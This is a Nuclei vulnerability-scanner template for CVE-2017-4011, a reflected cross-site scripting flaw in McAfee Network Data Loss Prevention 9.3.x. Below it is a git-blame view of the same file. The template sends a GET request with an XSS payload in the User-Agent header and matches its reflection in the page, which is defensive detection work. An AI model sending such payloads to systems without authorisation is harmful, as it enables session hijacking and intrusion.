nuclei-templates/http/cves/2017/CVE-2017-4011.yaml

id: CVE-2017-4011

info:
  name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.
  reference:
    - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10198
    - https://nvd.nist.gov/vuln/detail/CVE-2017-4011
    - http://www.securitytracker.com/id/1038523
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-4011
    cwe-id: CWE-79
    epss-score: 0.00142
    epss-percentile: 0.49103
    cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mcafee
    product: network_data_loss_prevention
  tags: cve,cve2017,mcafee,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950
Update and rename CVE-2017–4011.yaml to CVE-2017-4011.yaml 2021-08-20 21:00:02 +00:00			`id: CVE-2017-4011`
Create CVE-2017–4011.yaml 2021-08-16 20:45:09 +00:00
			`info:`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting`
Update CVE-2017–4011.yaml 2021-08-17 11:31:34 +00:00			`author: geeknik`
			`severity: medium`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.`
updated other CVEs 2023-09-06 13:22:34 +00:00			`remediation: \|`
			`Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.`
Create CVE-2017–4011.yaml 2021-08-16 20:45:09 +00:00			`reference:`
			`- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab`
Update CVE-2017–4011.yaml 2021-08-17 11:31:34 +00:00			`- https://kc.mcafee.com/corporate/index?page=content&id=SB10198`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2017-4011`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- http://www.securitytracker.com/id/1038523`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2017-4011`
			`cwe-id: CWE-79`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.00142`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-percentile: 0.49103`
updated other CVEs 2023-09-06 13:22:34 +00:00			`cpe: cpe:2.3:a:mcafee:network_data_loss_prevention::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: mcafee`
			`product: network_data_loss_prevention`
			`tags: cve,cve2017,mcafee,xss`
Create CVE-2017–4011.yaml 2021-08-16 20:45:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2017–4011.yaml 2021-08-16 20:45:09 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Create CVE-2017–4011.yaml 2021-08-16 20:45:09 +00:00			`headers:`
			`User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"`
Update CVE-2017–4011.yaml 2021-08-17 11:31:34 +00:00
Create CVE-2017–4011.yaml 2021-08-16 20:45:09 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950`